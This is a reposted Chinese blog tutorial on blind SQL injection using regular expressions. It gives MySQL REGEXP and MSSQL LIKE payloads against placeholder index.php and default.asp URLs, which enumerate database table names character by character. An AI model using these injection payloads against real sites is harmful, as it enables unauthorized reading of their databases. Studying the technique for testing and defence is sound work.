码迷,mamicode.com
首页 > 数据库 > 详细

sql 盲注之正则表达式攻击

时间:2014-10-29 18:47:43      阅读:159      评论:0      收藏:0      [点我收藏+]

标签:style   http   io   使用   for   sp   on   bs   ef   

转自:http://hi.baidu.com/zh2089/item/819d2373d7834728d7a89c9e

 

 

HRay注:虽然注入一直在谈,不过真正算得上精通的又能有多少人,一篇盲注的文章,转载过来,方便自己,也希望对大家有帮助

之前的博文已经提到过基于时间差的注入攻击,其实利用正则表达式进行盲注将节省大量的时间:

-----------------------------------------MYSQL 5+-----------------------------------------

我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下:

1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

注:正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP ‘^[a-z]‘ LIMIT 0,1) /*

2. 判断第一个字符是否是a-n中的字符

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP ‘^[a-n]‘ LIMIT 0,1)/*

3. 确定该字符为n

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP ‘^n‘ LIMIT 0,1) /*

4. 表达式的更换如下

expression like this: ‘^n[a-z]‘ -> ‘^ne[a-z]‘ -> ‘^new[a-z]‘ -> ‘^news[a-z]‘ -> FALSE

这时说明表名为news ,要验证是否是该表明 正则表达式为‘^news$‘,但是没这必要 直接判断 table_name = ’news‘ 不就行了。

5.接下来猜解其它表了 只需要修改 limit 1,1 -> limit 2,1就可以对接下来的表进行盲注了。

-----------------------------------------------MSSQL---------------------------------------------------

MSSQL所用的正则表达式并不是标准正则表达式 ,该表达式使用 like关键词

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name LIKE ‘[a-z]%‘ )

该查询语句中,select top 1 是一个组合哦,不要看错了。

如果要查询其它的表名,由于不能像mysql哪样用limit x,1,只能使用 table_name not in (select top x table_name from information_schema.tables) 意义是:表名没有在前x行里,其实查询的就是第x+1行。

例如 查询第二行的表名:

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name NOT IN ( SELECT TOP 1 table_name FROM information_schema.tables) and table_name LIKE ‘[a-z]%‘ )

表达式的顺序:

‘n[a-z]%‘ -> ‘ne[a-z]%‘ -> ‘new[a-z]%‘ -> ‘news[a-z]%‘ -> TRUE

之所以表达式 news[a-z]查询后返回正确是应为%代表0-n个字符,使用"_"则只能代表一个字符。故确认后续是否还有字符克用如下表达式

‘news%‘ TRUE -> ‘news_‘ FALSE

同理可以用相同的方法获取字段,值。这里就不再详细描述了。

ps: 盲注是体力活,不过了解了原理,编程大牛们可以考虑实现一个软件哦!

sql 盲注之正则表达式攻击

标签:style   http   io   使用   for   sp   on   bs   ef   

原文地址:http://www.cnblogs.com/dashu0211/p/4059909.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!